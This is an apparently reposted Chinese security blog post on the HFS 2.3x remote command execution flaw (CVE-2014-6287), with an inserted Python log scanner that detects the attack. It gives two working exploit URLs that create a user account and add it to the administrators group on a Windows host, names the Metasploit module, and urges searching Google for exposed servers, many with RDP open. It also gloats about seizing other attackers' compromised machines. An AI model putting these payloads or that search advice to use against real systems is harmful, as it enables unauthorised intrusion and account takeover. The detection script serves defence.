Review: HFS 2.3x remote command execution, the chicken-catching hacker's "doomsday" (CVE-2014-6287)

Source: Internet
Author: User
Tags: cve

Last year the HFS 2.3x remote command execution vulnerability made a lot of people suffer, especially some "hackers": many of the people who mass-compromise hosts ("catch chickens", i.e. build botnets of zombie machines) love to use HFS to serve files, so the hosts they had worked hard to compromise ended up being shared with everyone else. We analyzed the vulnerability and learned that a flaw in a regular expression is what leads to remote code execution.

Let's test the power of this vulnerability locally. Why bring it up again half a year later? Because a casual search today still turns up many domestic hosts running this version, including some "chicken-catching hackers" (anyone still on this version is probably a novice), schools and so on. Interestingly, servers running HFS generally also have port 3389 open, which is nasty. For example:

More hosts can be found on Google.

[Screenshot: hfs01.jpg]

Testing a few of them, most have port 3389 open, which leaves these servers very insecure.

[Screenshot: hfs02.jpg]

Below we test on a local virtual machine that simulates a "chicken-catching hacker" host. Visiting the target URL, we find a muma.exe, the kind of trojan usually planted for drive-by downloads. The example is adapted from a real case.

[Screenshot: hfs03.jpg]

You can then use the following exploit requests to add an administrator account on the target host and then log on remotely.

http://192.168.72.144:8080/?search==%00{.exec|cmd.exe/c net user zerosecurity 12345/add.}

http://192.168.72.144:8080/?search==%00{.exec|cmd.exe/c net localgroup administrators zerosecurity/add.}

Tip: in some versions the search parameter is not exposed on the front page; try the site's search box when using this.
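As an added defender-side example (not from the original post), the following Python script scans web-server access-log lines for the null-byte macro injection shown above, which is what CVE-2014-6287 looks like on the wire. The log lines are constructed, and the common-log-format layout and field names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (common log format) for an HFS instance.
# The first two carry the macro injection from this post, once raw and once URL-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Feb/2015:10:01:02 +0800] "GET /?search==%00{.exec|cmd.exe/c net user zerosecurity 12345/add.} HTTP/1.1" 200 512
10.0.0.5 - - [10/Feb/2015:10:01:09 +0800] "GET /?search=%00%7B.exec%7Ccmd.exe/c%20net%20localgroup%20administrators%20zerosecurity/add.%7D HTTP/1.1" 200 512
10.0.0.6 - - [10/Feb/2015:10:02:30 +0800] "GET /?search=report.pdf HTTP/1.1" 200 2048
10.0.0.7 - - [10/Feb/2015:10:03:11 +0800] "GET /muma.exe HTTP/1.1" 200 40960
"""

# Client IP, timestamp, method and request path of a common-log-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)'
)

# HFS macros look like {.name|args.}; the leading null byte is what slips the
# payload past the 2.3x search regex. Flag a null byte followed by a macro
# opener, or the exec macro itself regardless of how it was reached.
MACRO_RE = re.compile(r'\x00\s*\{\.|\{\.exec\|', re.IGNORECASE)


def decode_path(path):
    """URL-decode twice so double-encoded braces and pipes are not missed."""
    return unquote(unquote(path))


def find_hfs_macro_injections(log_text):
    """Return one dict per log line whose decoded request path carries an HFS macro injection."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        decoded = decode_path(m.group('path'))
        if MACRO_RE.search(decoded):
            hits.append({'ip': m.group('ip'), 'ts': m.group('ts'), 'path': decoded})
    return hits


if __name__ == '__main__':
    for hit in find_hfs_macro_injections(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} HFS macro injection: {hit['path']!r}")
```

A hit means the host was actively probed with the macro injection; treat it as a suspected compromise and check for newly created local accounts and RDP logons, which is exactly what the post's payload produces.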

After logging into Remote Desktop, you can see that the administrator account was successfully added.

[Screenshot: hfs04.jpg]

At the same time we can see that the "hacker's" own compromised hosts have also fallen into our hands.

[Screenshot: hfs05.jpg]

Metasploit also has a corresponding exploit module; I won't elaborate on it here, interested readers can try it themselves.

Module: exploit/windows/http/rejetto_hfs_exec
Affected version: HFS 2.37
CVE: CVE-2014-6287
Trigger platform: Windows


What? You want to build your own chicken farm too? I'll talk about that later.

This article is from the "Nocturnal Person" blog, so be sure to keep this source http://zerosecurity.blog.51cto.com/9913090/1617417
